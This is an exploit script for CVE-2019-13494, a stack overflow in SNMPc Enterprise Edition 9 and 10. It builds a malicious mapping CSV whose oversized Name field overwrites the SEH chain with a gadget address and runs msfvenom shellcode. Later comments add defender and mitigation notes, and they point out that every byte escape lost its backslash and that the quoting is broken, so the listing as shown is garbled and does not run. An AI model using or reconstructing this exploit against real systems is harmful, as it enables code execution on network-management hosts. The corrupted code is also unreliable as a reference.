SNMPc Enterprise Edition versions 9 and 10 suffer from a mapping filename buffer overflow vulnerability.

MD5 | 109af1e27d2b7507c41e3905ac72c086

#!/usr/bin/python
# -*- coding: utf-8 -*-

#--------------------------------------------------------------------#
# Exploit: SNMPc Enterprise Edition (9 & 10) (Mapping File Name BOF) #
# Date: 11 July 2019 #
# Exploit Author: @xerubus | mogozobo.com #
# Vendor Homepage: https://www.castlerock.com/ #
# Software Link: https://www.castlerock.com/products/snmpc/ #
# Version: Enterprise Edition 9 & 10 #
# Tested on: Windows 7 #
# CVE-ID: CVE-2019-13494 #
# Full write-up: https://www.mogozobo.com/?p=3534 #
#--------------------------------------------------------------------#
# Proof-of-concept for CVE-2019-13494 (see header): assembles a SNMPc mapping
# CSV whose node "Name" field is oversized, so that importing it overflows a
# stack buffer and overwrites the SEH chain, then writes it to disk.
#
# NOTE(review): this copy is not byte-accurate. Every "\x.." escape in the
# string literals below has lost its backslash in extraction, the quoting of
# the two padding literals is unbalanced, and the print statements are
# Python 2 syntax — as captured the listing does not parse and, even if it
# did, would emit plain ASCII rather than the intended bytes. The notes on
# each literal say what it was evidently meant to hold; nothing is restored.
#
# Defender notes: the only trigger visible here is an operator importing the
# generated file into SNMPc (the final message tells the user to do so), so
# the exposure is a malicious or tampered mapping CSV. Mitigation is the
# vendor fix for CVE-2019-13494 and treating mapping files from outside the
# organisation as untrusted input. A simple detection heuristic for such a
# file is a "Name" column holding thousands of one repeated character
# followed by non-printable bytes.
import sys, os
# Cosmetic screen clear via a shell; 'clear' is Unix-specific. `sys` is
# imported but never used below.
os.system('clear')

# ASCII-art banner (garbled in this capture; lines inside the triple-quoted
# string are left untouched).
print("""
_ _
___ (~ )( ~)
/ _ / /
| D_ ] / -= SNMPc_Mapping_BOF by @xerubus =-
| D _]/ -= We all have something to hide =-
___/ / / \
(_ )( _)
@Xerubus
""")

# Output path, relative to the current working directory.
filename="evilmap.csv"
# Filler that pads the vulnerable field up to the SEH record; the 2064
# offset was determined by the author and is not derivable from this listing.
junk = "A" * 2064
# NOTE(review): the next two literals were evidently written as 4-byte "\x.."
# escapes (the trailing comments spell the values out) but the backslashes
# were stripped in extraction, so as captured they are short ASCII strings.
# Intended roles: nSEH = short jump over the SEH slot into the payload,
# SEH = address of a pop/pop/ret gadget inside CRDBAPI.dll. After a crash,
# an SEH record pointing into that module would be the forensic fingerprint
# of this PoC; the module was presumably chosen for a fixed load address,
# which this listing does not show.
nseh = "xebx07x90x90" # short jmp to 0018f58d xebx07x90x90
seh = "x05x3cx0ex10" # 0x100e3c05 ; pop esi # pop edi # ret (C:program files (x86)snmpc network managerCRDBAPI.dll)

# Pre-padding of mapping file. Note mandatory trailing character return.
# NOTE(review): the column-header row and the "Root Subnet" row below look
# like they were one triple-quoted literal; as captured only the closing
# `"""` survives, so this statement does not parse, and the trailing `n` on
# the subnet row is most likely a stripped "\n". The header row is useful to
# defenders as the mapping-file schema the SNMPc import parser reads; by the
# layout of `buffer` below, the overflowing data lands in the first ("Name")
# column of the device row that follows.
pre_padding = (
"Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password"
""Root Subnet","Subnet","","","","2","000=Unknown","","auto.ico","","2","Square","(NULL)","(0,0)","N/A","True","auto.exe","00 00 00 00 00 00","127.0.0.1","30","2","2","","0","0","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","",""n"
""")

# Post-padding of mapping file. Note mandatory trailing character return.
# NOTE(review): remaining columns of the device row plus a trailing newline
# (captured as a bare `n`); the original quoting is not recoverable from
# this copy and the line does not parse as shown.
post_padding = (
"","Device","127.0.0.1","1.3.6.1.4.1.29671.2.107","","3","000=Unknown","000=Unknown","auto.ico","","2","Square","Root Subnet(2)","(-16,-64)","N/A","True","auto.exe","00 00 00 00 00 00","127.0.0.1","30","2","2","","0","=","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","",""n")

# msfvenom command that produced the payload (options garbled in capture:
# `—platform` is `--platform`, and the bad-character list lost its
# backslashes). The payload launches calc.exe — a benign pop-up used to
# prove code execution — encoded to avoid the bytes listed as bad characters
# for this file format. As with the other literals, the escapes below are
# stripped, so as captured these are ASCII strings rather than machine code;
# do not mistake that for the script being harmless, since the original is a
# working payload.
# msfvenom —platform windows -p windows/exec cmd=calc.exe -b "x00x0ax0d" -f c
shellcode = (
"xdaxccxd9x74x24xf4xbaxd9xa1x94x48x5fx2bxc9xb1"
"x31x31x57x18x83xc7x04x03x57xcdx43x61xb4x05x01"
"x8ax45xd5x66x02xa0xe4xa6x70xa0x56x17xf2xe4x5a"
"xdcx56x1dxe9x90x7ex12x5ax1ex59x1dx5bx33x99x3c"
"xdfx4excex9exdex80x03xdex27xfcxeexb2xf0x8ax5d"
"x23x75xc6x5dxc8xc5xc6xe5x2dx9dxe9xc4xe3x96xb3"
"xc6x02x7bxc8x4ex1dx98xf5x19x96x6ax81x9bx7exa3"
"x6ax37xbfx0cx99x49x87xaax42x3cxf1xc9xffx47xc6"
"xb0xdbxc2xddx12xafx75x3axa3x7cxe3xc9xafxc9x67"
"x95xb3xccxa4xadxcfx45x4bx62x46x1dx68xa6x03xc5"
"x11xffxe9xa8x2ex1fx52x14x8bx6bx7ex41xa6x31x14"
"x94x34x4cx5ax96x46x4fxcaxffx77xc4x85x78x88x0f"
"xe2x77xc2x12x42x10x8bxc6xd7x7dx2cx3dx1bx78xaf"
"xb4xe3x7fxafxbcxe6xc4x77x2cx9ax55x12x52x09x55"
"x37x31xccxc5xdbx98x6bx6ex79xe5")


# Python 2 print statements (no parentheses): the script will not run
# unchanged under Python 3.
print "[+] Building payload.."
# 10-byte NOP sled ahead of the shellcode ("x90" is another stripped "\x90").
payload = "x90" * 10 + shellcode
print "[+] Creating buffer.."
# Record layout: header + subnet row, then the oversized Name field made of
# filler | nSEH | SEH | sled + shellcode | sled, then the rest of the device
# row. `buffer` shadows the Python 2 builtin of the same name.
buffer = pre_padding + junk + nseh + seh + payload + "x90" * 10 + post_padding
print "[+] Writing evil mapping file.."
# Text-mode write without a context manager; the handle is closed explicitly
# below. Text mode on Windows would translate line endings and corrupt a
# binary payload — presumably fine here only because the script is run from
# a Unix shell, as the 'clear' call suggests.
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Trailing `nn` is a stripped "\n\n". The overflow fires only when a user
# imports the file into SNMPc, which is why untrusted mapping files are the
# thing to control.
print "[+] Done. Import evilmap.csv into SNMPc and A Wild Calc Appears!nn"